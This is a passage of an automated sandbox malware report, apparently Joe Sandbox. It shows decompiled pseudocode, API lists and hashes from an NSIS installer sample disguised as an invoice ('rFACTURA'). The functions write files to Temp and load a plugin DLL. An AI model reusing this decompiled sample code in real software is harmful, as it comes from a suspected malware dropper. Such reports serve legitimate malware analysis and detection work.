                                                                                                  						goto L43;
                                                                                                  					}
                                                                                                  					_t86 =  *0x7a8a2c;
                                                                                                  					__eflags = _t86;
                                                                                                  					_t108 = 2;
                                                                                                  					if(_t86 >= 0) {
                                                                                                  						L13:
                                                                                                  						_v8 = 1;
                                                                                                  						L14:
                                                                                                  						__eflags =  *0x7a8ac4;
                                                                                                  						if( *0x7a8ac4 != 0) {
                                                                                                  							_push("true");
                                                                                                  							_pop(_t108);
                                                                                                  						}
                                                                                                  						__eflags = _t47;
                                                                                                  						if(__eflags >= 0) {
                                                                                                  							__eflags = _t47 - 0x25;
                                                                                                  							if(_t47 != 0x25) {
                                                                                                  								__eflags = _t47 - 0x24;
                                                                                                  								if(_t47 == 0x24) {
                                                                                                  									GetWindowsDirectoryW(_t110, 0x400);
                                                                                                  									_t108 = 0;
                                                                                                  								}
                                                                                                  								while(1) {
                                                                                                  									__eflags = _t108;
                                                                                                  									if(_t108 == 0) {
                                                                                                  										goto L30;
                                                                                                  									}
                                                                                                  									_t58 =  *0x7a8a24;
                                                                                                  									_t108 = _t108 - 1;
                                                                                                  									__eflags = _t58;
                                                                                                  									if(_t58 == 0) {
                                                                                                  										L26:
                                                                                                  										_t60 = SHGetSpecialFolderLocation( *0x7a8a28,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
                                                                                                  										__eflags = _t60;
                                                                                                  										if(_t60 != 0) {
                                                                                                  											L28:
                                                                                                  											 *_t110 =  *_t110 & 0x00000000;
                                                                                                  											__eflags =  *_t110;
                                                                                                  											continue;
                                                                                                  										}
                                                                                                  										__imp__SHGetPathFromIDListW(_v12, _t110);
                                                                                                  										__imp__CoTaskMemFree(_v12);
                                                                                                  										__eflags = _t60;
                                                                                                  										if(_t60 != 0) {
                                                                                                  											goto L30;
                                                                                                  										}
                                                                                                  										goto L28;
                                                                                                  									}
                                                                                                  									__eflags = _v8;
                                                                                                  									if(_v8 == 0) {
                                                                                                  										goto L26;
                                                                                                  									}
                                                                                                  									_t62 =  *_t58( *0x7a8a28,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
                                                                                                  									__eflags = _t62;
                                                                                                  									if(_t62 == 0) {
                                                                                                  										goto L30;
                                                                                                  									}
                                                                                                  									goto L26;
                                                                                                  								}
                                                                                                  								goto L30;
                                                                                                  							}
                                                                                                  							GetSystemDirectoryW(_t110, 0x400);
                                                                                                  							goto L30;
                                                                                                  						} else {
                                                                                                  							E0040612D( *0x7a8a78, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a78 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
                                                                                                  							__eflags =  *_t110;
                                                                                                  							if( *_t110 != 0) {
                                                                                                  								L32:
                                                                                                  								__eflags = _t76 - 0x1a;
                                                                                                  								if(_t76 == 0x1a) {
                                                                                                  									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                  								}
                                                                                                  								goto L34;
                                                                                                  							}
                                                                                                  							E00406281(_t76, _t108, _t110, _t110, _t76);
                                                                                                  							L30:
                                                                                                  							__eflags =  *_t110;
                                                                                                  							if( *_t110 == 0) {
                                                                                                  								goto L34;
                                                                                                  							}
                                                                                                  							_t76 = _v16;
                                                                                                  							goto L32;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					__eflags = _t86 - 0x5a04;
                                                                                                  					if(_t86 == 0x5a04) {
                                                                                                  						goto L13;
                                                                                                  					}
                                                                                                  					__eflags = _t76 - 0x23;
                                                                                                  					if(_t76 == 0x23) {
                                                                                                  						goto L13;
                                                                                                  					}
                                                                                                  					__eflags = _t76 - 0x2e;
                                                                                                  					if(_t76 == 0x2e) {
                                                                                                  						goto L13;
                                                                                                  					} else {
                                                                                                  						_v8 = _v8 & 0x00000000;
                                                                                                  						goto L14;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				 *_t110 =  *_t110 & 0x00000000;
                                                                                                  				if(_a4 == 0) {
                                                                                                  					return _t44;
                                                                                                  				}
                                                                                                  				return E0040625F(_a4, _t44);
                                                                                                  			}
































                                                                                                  APIs
                                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063C2
                                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004063D5
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(004052FA,007924D8,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 00406411
                                                                                                  • SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 0040641F
                                                                                                  • CoTaskMemFree.OLE32(007924D8), ref: 0040642A
                                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406450
                                                                                                  • lstrlenW.KERNEL32(Call,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004064A8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                  • API String ID: 717251189-1230650788
                                                                                                  • Opcode ID: 1ab1bfc9e483f0d7decbabd2a64a8250e199f3f83b6f9b6e16045226286d04ff
                                                                                                  • Instruction ID: 53892de15873aface2ea8104bec8e4e448d1085f61c5dcff38edd77b46373637
                                                                                                  • Opcode Fuzzy Hash: 1ab1bfc9e483f0d7decbabd2a64a8250e199f3f83b6f9b6e16045226286d04ff
                                                                                                  • Instruction Fuzzy Hash: AA610371A00111AADF249F64DC40ABE37A5BF55324F12813FE547B62D0DB3D89A2CB5D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  [Control-flow graph of function 0040176F, image not reproduced; legend: Executed, Not Executed]
                                                                                                  C-Code - Quality: 61%
                                                                                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                                  				void* __edi;
                                                                                                  				void* _t35;
                                                                                                  				void* _t43;
                                                                                                  				void* _t45;
                                                                                                  				FILETIME* _t51;
                                                                                                  				FILETIME* _t64;
                                                                                                  				void* _t66;
                                                                                                  				signed int _t72;
                                                                                                  				FILETIME* _t73;
                                                                                                  				FILETIME* _t77;
                                                                                                  				signed int _t79;
                                                                                                  				void* _t81;
                                                                                                  				void* _t82;
                                                                                                  				WCHAR* _t84;
                                                                                                  				void* _t86;
                                                                                                  
                                                                                                  				_t77 = __ebx;
                                                                                                  				 *(_t86 - 8) = E00402C37(0x31);
                                                                                                  				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
                                                                                                  				_t35 = E00405BA7( *(_t86 - 8));
                                                                                                  				_push( *(_t86 - 8));
                                                                                                  				_t84 = L"Call";
                                                                                                  				if(_t35 == 0) {
                                                                                                  					lstrcatW(E00405B30(E0040625F(_t84, L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated")), ??);
                                                                                                  				} else {
                                                                                                  					E0040625F();
                                                                                                  				}
                                                                                                  				E004064F3(_t84);
                                                                                                  				while(1) {
                                                                                                  					__eflags =  *(_t86 + 8) - 3;
                                                                                                  					if( *(_t86 + 8) >= 3) {
                                                                                                  						_t66 = E004065A2(_t84);
                                                                                                  						_t79 = 0;
                                                                                                  						__eflags = _t66 - _t77;
                                                                                                  						if(_t66 != _t77) {
                                                                                                  							_t73 = _t66 + 0x14;
                                                                                                  							__eflags = _t73;
                                                                                                  							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
                                                                                                  						}
                                                                                                  						asm("sbb eax, eax");
                                                                                                  						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                                  						__eflags = _t72;
                                                                                                  						 *(_t86 + 8) = _t72;
                                                                                                  					}
                                                                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                                                                  					if( *(_t86 + 8) == _t77) {
                                                                                                  						E00405D2C(_t84);
                                                                                                  					}
                                                                                                  					__eflags =  *(_t86 + 8) - 1;
                                                                                                  					_t43 = E00405D51(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                                  					__eflags = _t43 - 0xffffffff;
                                                                                                  					 *(_t86 - 0x30) = _t43;
                                                                                                  					if(_t43 != 0xffffffff) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					__eflags =  *(_t86 + 8) - _t77;
                                                                                                  					if( *(_t86 + 8) != _t77) {
                                                                                                  						E004052C3(0xffffffe2,  *(_t86 - 8));
                                                                                                  						__eflags =  *(_t86 + 8) - 2;
                                                                                                  						if(__eflags == 0) {
                                                                                                  							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                                  						}
                                                                                                  						L31:
                                                                                                  						 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t86 - 4));
                                                                                                  						__eflags =  *0x7a8ac8;
                                                                                                  						goto L32;
                                                                                                  					} else {
                                                                                                  						E0040625F("C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp", _t81);
                                                                                                  						E0040625F(_t81, _t84);
                                                                                                  						E00406281(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
                                                                                                  						E0040625F(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp");
                                                                                                  						_t64 = E004058C1("C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
                                                                                                  						__eflags = _t64;
                                                                                                  						if(_t64 == 0) {
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							__eflags = _t64 == 1;
                                                                                                  							if(_t64 == 1) {
                                                                                                  								 *0x7a8ac8 =  &( *0x7a8ac8->dwLowDateTime);
                                                                                                  								L32:
                                                                                                  								_t51 = 0;
                                                                                                  								__eflags = 0;
                                                                                                  							} else {
                                                                                                  								_push(_t84);
                                                                                                  								_push(0xfffffffa);
                                                                                                  								E004052C3();
                                                                                                  								L29:
                                                                                                  								_t51 = 0x7fffffff;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  					L33:
                                                                                                  					return _t51;
                                                                                                  				}
                                                                                                  				E004052C3(0xffffffea,  *(_t86 - 8)); // executed
                                                                                                  				 *0x7a8af4 =  *0x7a8af4 + 1;
                                                                                                  				_push(_t77);
                                                                                                  				_push(_t77);
                                                                                                  				_push( *(_t86 - 0x30));
                                                                                                  				_push( *((intOrPtr*)(_t86 - 0x20)));
                                                                                                  				_t45 = E004030FA(); // executed
                                                                                                  				 *0x7a8af4 =  *0x7a8af4 - 1;
                                                                                                  				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
                                                                                                  				_t82 = _t45;
                                                                                                  				if( *(_t86 - 0x1c) != 0xffffffff) {
                                                                                                  					L22:
                                                                                                  					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
                                                                                                  				} else {
                                                                                                  					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
                                                                                                  					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
                                                                                                  						goto L22;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				CloseHandle( *(_t86 - 0x30)); // executed
                                                                                                  				__eflags = _t82 - _t77;
                                                                                                  				if(_t82 >= _t77) {
                                                                                                  					goto L31;
                                                                                                  				} else {
                                                                                                  					__eflags = _t82 - 0xfffffffe;
                                                                                                  					if(_t82 != 0xfffffffe) {
                                                                                                  						E00406281(_t77, _t82, _t84, _t84, 0xffffffee);
                                                                                                  					} else {
                                                                                                  						E00406281(_t77, _t82, _t84, _t84, 0xffffffe9);
                                                                                                  						lstrcatW(_t84,  *(_t86 - 8));
                                                                                                  					}
                                                                                                  					_push(0x200010);
                                                                                                  					_push(_t84);
                                                                                                  					E004058C1();
                                                                                                  					goto L29;
                                                                                                  				}
                                                                                                  				goto L33;
                                                                                                  			}


















                                                                                                  0x00402aca
                                                                                                  0x00402ace
                                                                                                  0x00402ace
                                                                                                  0x00401892
                                                                                                  0x00401897
                                                                                                  0x0040189d
                                                                                                  0x0040189e
                                                                                                  0x0040189f
                                                                                                  0x004018a2
                                                                                                  0x004018a5
                                                                                                  0x004018aa
                                                                                                  0x004018b0
                                                                                                  0x004018b4
                                                                                                  0x004018b6
                                                                                                  0x004018be
                                                                                                  0x004018ca
                                                                                                  0x004018b8
                                                                                                  0x004018b8
                                                                                                  0x004018bc
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004018bc
                                                                                                  0x004018d3
                                                                                                  0x004018d9
                                                                                                  0x004018db
                                                                                                  0x00000000
                                                                                                  0x004018e1
                                                                                                  0x004018e1
                                                                                                  0x004018e4
                                                                                                  0x004018fc
                                                                                                  0x004018e6
                                                                                                  0x004018e9
                                                                                                  0x004018f2
                                                                                                  0x004018f2
                                                                                                  0x00401901
                                                                                                  0x00401906
                                                                                                  0x004022ec
                                                                                                  0x00000000
                                                                                                  0x004022ec
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated,?,?,00000031), ref: 004017D5
                                                                                                    • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,Tophyperidrosis Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C
                                                                                                    • Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                                                                                    • Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                                                                                    • Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
                                                                                                    • Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                                                                                    • Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                                                                                    • Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                                                                                    • Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$C:\Users\user\AppData\Local\Temp\nsp1D68.tmp$C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll$Call
                                                                                                  • API String ID: 1941528284-359380382
                                                                                                  • Opcode ID: 3036717f3dd684cf2377e65c949b0f8917e20074c55b6eb4d43db9bd976140e3
                                                                                                  • Instruction ID: f7ad0716a47908c9ff001062aeffa45098cd3b08a1486a00dbbe40ca2a302bdd
                                                                                                  • Opcode Fuzzy Hash: 3036717f3dd684cf2377e65c949b0f8917e20074c55b6eb4d43db9bd976140e3
                                                                                                  • Instruction Fuzzy Hash: 56419671910515BECF117BA5CD85DAF3A75EF41329B20823FF412B11E2CA3C8A529A6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 629 402644-40265d call 402c15 632 402663-40266a 629->632 633 402abf-402ac2 629->633 635 40266c 632->635 636 40266f-402672 632->636 634 402ac8-402ace 633->634 635->636 638 4027d6-4027de 636->638 639 402678-402687 call 4061bf 636->639 638->633 639->638 642 40268d 639->642 643 402693-402697 642->643 644 40272c-40272f 643->644 645 40269d-4026b8 ReadFile 643->645 646 402731-402734 644->646 647 402747-402757 call 405dd4 644->647 645->638 648 4026be-4026c3 645->648 646->647 649 402736-402741 call 405e32 646->649 647->638 658 402759 647->658 648->638 651 4026c9-4026d7 648->651 649->638 649->647 654 402792-40279e call 4061a6 651->654 655 4026dd-4026ef MultiByteToWideChar 651->655 654->634 655->658 659 4026f1-4026f4 655->659 661 40275c-40275f 658->661 662 4026f6-402701 659->662 661->654 663 402761-402766 661->663 662->661 664 402703-402728 SetFilePointer MultiByteToWideChar 662->664 666 4027a3-4027a7 663->666 667 402768-40276d 663->667 664->662 665 40272a 664->665 665->658 668 4027c4-4027d0 SetFilePointer 666->668 669 4027a9-4027ad 666->669 667->666 670 40276f-402782 667->670 668->638 671 4027b5-4027c2 669->671 672 4027af-4027b3 669->672 670->638 673 402784-40278a 670->673 671->638 672->668 672->671 673->643 674 402790 673->674 674->638
                                                                                                  C-Code - Quality: 83%
                                                                                                  			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
                                                                                                  				intOrPtr _t65;
                                                                                                  				intOrPtr _t66;
                                                                                                  				intOrPtr _t72;
                                                                                                  				void* _t76;
                                                                                                  				void* _t79;
                                                                                                  
                                                                                                  				_t72 = __edx;
                                                                                                  				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                                  				_t65 = 2;
                                                                                                  				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
                                                                                                  				_t66 = E00402C15(_t65);
                                                                                                  				_t79 = _t66 - 1;
                                                                                                  				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
                                                                                                  				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
                                                                                                  				if(_t79 < 0) {
                                                                                                  					L36:
                                                                                                  					 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t76 - 4));
                                                                                                  				} else {
                                                                                                  					__ecx = 0x3ff;
                                                                                                  					if(__eax > 0x3ff) {
                                                                                                  						 *(__ebp - 0x3c) = 0x3ff;
                                                                                                  					}
                                                                                                  					if( *__esi == __bx) {
                                                                                                  						L34:
                                                                                                  						__ecx =  *(__ebp - 0xc);
                                                                                                  						__eax =  *(__ebp - 8);
                                                                                                  						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                                  						if(_t79 == 0) {
                                                                                                  							 *((intOrPtr*)(_t76 - 4)) = 1;
                                                                                                  						}
                                                                                                  						goto L36;
                                                                                                  					} else {
                                                                                                  						 *(__ebp - 0x30) = __ebx;
                                                                                                  						 *(__ebp - 0x10) = E004061BF(__ecx, __esi);
                                                                                                  						if( *(__ebp - 0x3c) > __ebx) {
                                                                                                  							do {
                                                                                                  								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
                                                                                                  									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E32( *(__ebp - 0x10), __ebx) >= 0) {
                                                                                                  										__eax = __ebp - 0x44;
                                                                                                  										if(E00405DD4( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
                                                                                                  											goto L34;
                                                                                                  										} else {
                                                                                                  											goto L21;
                                                                                                  										}
                                                                                                  									} else {
                                                                                                  										goto L34;
                                                                                                  									}
                                                                                                  								} else {
                                                                                                  									__eax = __ebp - 0x38;
                                                                                                  									_push(__ebx);
                                                                                                  									_push(__ebp - 0x38);
                                                                                                  									__eax = 2;
                                                                                                  									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
                                                                                                  									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
                                                                                                  									if(__eax == 0) {
                                                                                                  										goto L34;
                                                                                                  									} else {
                                                                                                  										__ecx =  *(__ebp - 0x38);
                                                                                                  										if(__ecx == __ebx) {
                                                                                                  											goto L34;
                                                                                                  										} else {
                                                                                                  											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                                  											 *(__ebp - 0x48) = __ecx;
                                                                                                  											 *(__ebp - 0x44) = __eax;
                                                                                                  											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                                                  												L28:
                                                                                                  												__ax & 0x0000ffff = E004061A6( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                                  											} else {
                                                                                                  												__ebp - 0x44 = __ebp + 0xa;
                                                                                                  												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, ?str?) != 0) {
                                                                                                  													L21:
                                                                                                  													__eax =  *(__ebp - 0x44);
                                                                                                  												} else {
                                                                                                  													__esi =  *(__ebp - 0x48);
                                                                                                  													__esi =  ~( *(__ebp - 0x48));
                                                                                                  													while(1) {
                                                                                                  														_t22 = __ebp - 0x38;
                                                                                                  														 *_t22 =  *(__ebp - 0x38) - 1;
                                                                                                  														__eax = 0xfffd;
                                                                                                  														 *(__ebp - 0x44) = 0xfffd;
                                                                                                  														if( *_t22 == 0) {
                                                                                                  															goto L22;
                                                                                                  														}
                                                                                                  														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
                                                                                                  														__esi = __esi + 1;
                                                                                                  														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, "true"); // executed
                                                                                                  														__ebp - 0x44 = __ebp + 0xa;
                                                                                                  														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, ?str?) == 0) {
                                                                                                  															continue;
                                                                                                  														} else {
                                                                                                  															goto L21;
                                                                                                  														}
                                                                                                  														goto L22;
                                                                                                  													}
                                                                                                  												}
                                                                                                  												L22:
                                                                                                  												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                                                                  													goto L28;
                                                                                                  												} else {
                                                                                                  													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
                                                                                                  														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                                  															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
                                                                                                  															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, "true");
                                                                                                  														} else {
                                                                                                  															__ecx =  *(__ebp - 0xc);
                                                                                                  															__edx =  *(__ebp - 8);
                                                                                                  															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                  															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                  														}
                                                                                                  														goto L34;
                                                                                                  													} else {
                                                                                                  														__ecx =  *(__ebp - 0xc);
                                                                                                  														__edx =  *(__ebp - 8);
                                                                                                  														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                  														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                  														 *(__ebp - 0x30) = __eax;
                                                                                                  														if(__ax == __bx) {
                                                                                                  															goto L34;
                                                                                                  														} else {
                                                                                                  															goto L26;
                                                                                                  														}
                                                                                                  													}
                                                                                                  												}
                                                                                                  											}
                                                                                                  										}
                                                                                                  									}
                                                                                                  								}
                                                                                                  								goto L37;
                                                                                                  								L26:
                                                                                                  								__eax =  *(__ebp - 8);
                                                                                                  							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
                                                                                                  						}
                                                                                                  						goto L34;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				L37:
                                                                                                  				return 0;
                                                                                                  			}









                                                                                                  APIs
                                                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026EB
                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 0040270E
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402724
                                                                                                    • Part of subcall function 00405E32: SetFilePointer.KERNEL32(?,00000000,00000000,?,?,00000000,?,?,00402629,00000000,00000000,?,00000000,00000011), ref: 00405E48
                                                                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                  • String ID: 9
                                                                                                  • API String ID: 163830602-2366072709
                                                                                                  • Opcode ID: bbfadd1fb82cd2902055e903a3e488c979ded5586cb93e8eb0be3a96e306ad52
                                                                                                  • Instruction ID: 9be2b0b37b52d723af7ab0687330b4cdc43bee68c69c879290400e1721267ab5
                                                                                                  • Opcode Fuzzy Hash: bbfadd1fb82cd2902055e903a3e488c979ded5586cb93e8eb0be3a96e306ad52
                                                                                                  • Instruction Fuzzy Hash: BA51F675D00219AADF20DFA5DA88AAEB779FF04304F10443BE511F72D0DBB89982CB58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 675 4052c3-4052d8 676 4052de-4052ef 675->676 677 40538f-405393 675->677 678 4052f1-4052f5 call 406281 676->678 679 4052fa-405306 lstrlenW 676->679 678->679 681 405323-405327 679->681 682 405308-405318 lstrlenW 679->682 684 405336-40533a 681->684 685 405329-405330 SetWindowTextW 681->685 682->677 683 40531a-40531e lstrcatW 682->683 683->681 686 405380-405382 684->686 687 40533c-40537e SendMessageW * 3 684->687 685->684 686->677 688 405384-405387 686->688 687->686 688->677
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004052C3(signed int _a4, WCHAR* _a8) {
                                                                                                  				struct HWND__* _v8;
                                                                                                  				signed int _v12;
                                                                                                  				WCHAR* _v32;
                                                                                                  				long _v44;
                                                                                                  				int _v48;
                                                                                                  				void* _v52;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				WCHAR* _t27;
                                                                                                  				signed int _t28;
                                                                                                  				long _t29;
                                                                                                  				signed int _t37;
                                                                                                  				signed int _t38;
                                                                                                  
                                                                                                  				_t27 =  *0x7a7a04; // 0x403ba
                                                                                                  				_v8 = _t27;
                                                                                                  				if(_t27 != 0) {
                                                                                                  					_t37 =  *0x7a8af4;
                                                                                                  					_v12 = _t37;
                                                                                                  					_t38 = _t37 & 0x00000001;
                                                                                                  					if(_t38 == 0) {
                                                                                                  						E00406281(_t38, 0, 0x7a0f00, 0x7a0f00, _a4);
                                                                                                  					}
                                                                                                  					_t27 = lstrlenW(0x7a0f00);
                                                                                                  					_a4 = _t27;
                                                                                                  					if(_a8 == 0) {
                                                                                                  						L6:
                                                                                                  						if((_v12 & 0x00000004) == 0) {
                                                                                                  							_t27 = SetWindowTextW( *0x7a79e8, 0x7a0f00); // executed
                                                                                                  						}
                                                                                                  						if((_v12 & 0x00000002) == 0) {
                                                                                                  							_v32 = 0x7a0f00;
                                                                                                  							_v52 = 1;
                                                                                                  							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                                                                  							_v44 = 0;
                                                                                                  							_v48 = _t29 - _t38;
                                                                                                  							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                                                                  							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                                                                  						}
                                                                                                  						if(_t38 != 0) {
                                                                                                  							_t28 = _a4;
                                                                                                  							0x7a0f00[_t28] = 0;
                                                                                                  							return _t28;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_t27 = lstrlenW(_a8) + _a4;
                                                                                                  						if(_t27 < 0x1000) {
                                                                                                  							_t27 = lstrcatW(0x7a0f00, _a8);
                                                                                                  							goto L6;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t27;
                                                                                                  			}


















                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                                                                                  • lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                                                                                  • lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
                                                                                                  • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
